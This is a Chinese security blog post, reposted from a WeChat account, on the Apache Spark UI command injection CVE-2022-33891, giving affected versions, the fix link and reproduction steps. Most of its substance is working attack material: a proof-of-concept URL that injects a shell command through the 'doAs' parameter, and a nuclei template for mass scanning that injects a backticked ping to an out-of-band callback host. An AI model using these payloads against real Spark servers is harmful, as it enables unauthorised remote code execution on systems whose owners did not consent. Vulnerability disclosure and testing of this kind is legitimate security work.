Apache Spark UI 命令注入漏洞（CVE-2022-33891）

admin

101398
文章

87
评论

2022年7月21日18:22:28评论87 views字数 764阅读2分32秒阅读模式

影响版本：

3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.

Fix：

https://github.com/apache/spark/pull/36315/files

直接拼接 bash -c执行导致漏洞的产生。

复现

下载：https://archive.apache.org/dist/spark/spark-3.2.1/spark-3.2.1.tgz

cd assembly
mvn package -DskipTests
cd ../bin
./spark-shell --conf spark.acls.enable=true

poc:http://172.16.2.1:4040/?doAs=open%20-a%20Calculator

Apache Spark UI 命令注入漏洞（CVE-2022-33891）

nuclei批量验证脚本：

id: apache-spark-shell-rce
info: name: apache-spark-shell-rce author: tangxiaofeng7 severity: high reference:   - https://github.com/tangxiaofeng7 tags: rce
requests: - method: GET   path:     - '{{BaseURL}}/?doAs=`ping%20{{interactsh-url}}`'
   matchers:     - type: word       part: interactsh_protocol       name: http       words:         - "http"         - "dns"

Apache Spark UI 命令注入漏洞（CVE-2022-33891）

原文始发于微信公众号（白帽子飙车路）：Apache Spark UI 命令注入漏洞（CVE-2022-33891）

左青龙
微信扫一扫

右白虎
微信扫一扫

Apache Spark UI 命令注入漏洞（CVE-2022-33891）

影响版本：

Fix：

复现

用友NC Cloud importhttpscer接口存在任意文件上传漏洞

GL.iNet 路由器身份验证绕过漏洞 (CVE-2023-46453)

【漏洞预警】SEMCMS安全漏洞(CVE-2024-30938)

1day分享｜ Geoserver命令执行漏洞

漏洞预警 JEECMS o_upload 文件上传漏洞

用友U9 PatchFile.asmx接口存在任意文件上传漏洞

万户ezOFFICE-wf_printnum.jspSQL注入漏洞-附py

【漏洞预警】Progress Flowmon命令注入漏洞（CVE-2024-2389）

某捷通T KeyInfoList.aspx sql注入-附py

泰博云平台solr接口存在SSRF漏洞|漏洞预警

发表评论

在线咨询

微信